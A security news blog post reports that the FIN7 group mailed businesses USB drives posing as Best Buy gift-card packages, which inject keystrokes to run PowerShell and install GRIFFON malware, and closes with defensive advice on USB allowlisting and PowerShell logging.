Cyber AttacksMalware

Hackers sending malicious USB drives using Best Buy gift cards


Hackers have been targeting various businesses with malware infected USB devices. This is a new technique used by the FIN7 cyber criminal group to deliver GRIFFON malware.

A client of the cybersecurity company received a package, supposedly from Best Buy, with a loyalty reward in the form of a $50 gift card. The package also contained a USB drive claiming to contain a list of products eligible for purchase using the gift card.

According to FBI, the hackers have mailed similar packages to several businesses like retail, restaurant, hotel industry etc. targeting the employees in human resources, IT, or executive management departments.

FBI warns that the cyber criminals use the United States Postal Service (USPS) to mail packages that contain items like teddy bears or gift cards to target the employees.

The malicious drive is configured to imitate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker. Then, the USB device contacts domains or IP‌ addresses in Russia.

Trustwave analyzed this malicious USB activity and found two PowerShell commands that lead to showing a fake error for the thumb drive and ultimately to running third-stage JavaScript that can collect system information and downloading other malware.

The hackers use multiple tools like Metasploit, Cobalt Strike, PowerShell scripts, Carbanak malware, Griffon backdoor, Boostwrite malware dropper, and RdfSniffer module with remote access capabilities to attain their goal.

BadUSB‌ attacks are now common in penetration testing and it is possible to purchase more flexible ones for $100.

FIN7 used a simple and cheap version that costs between $5-$14, depending on the supplier and the shipping country. These had “HW-374” printed on the circuit board and are identified as an Arduino Leonardo, which is specifically programmed to act as a keyboard/mouse out of the box. Upon customization, the keystrokes and mouse movements are possible using the Arduino IDE.

It is not a best practice to connect unknown USB devices to a workstation but it is still ignored by many users.

It is necessary for the organizations to take precautions against attacks via malicious USB drives by permitting only devices after examining them based on their hardware ID and denying all others.

Also, updating PowerShell and enabling logging can help determine the attack vector and the steps leading to compromise.

Priyanka R
Cyber Security Enthusiast, Security Blogger, Technical Editor, Author at Cyber Safe News

    Local news sites used to install spyware on iPhones

    Previous article

    10 Best Web Application Penetration Testing Tools for 2020

    Next article

    You may also like


    Leave a reply

    Your email address will not be published. Required fields are marked *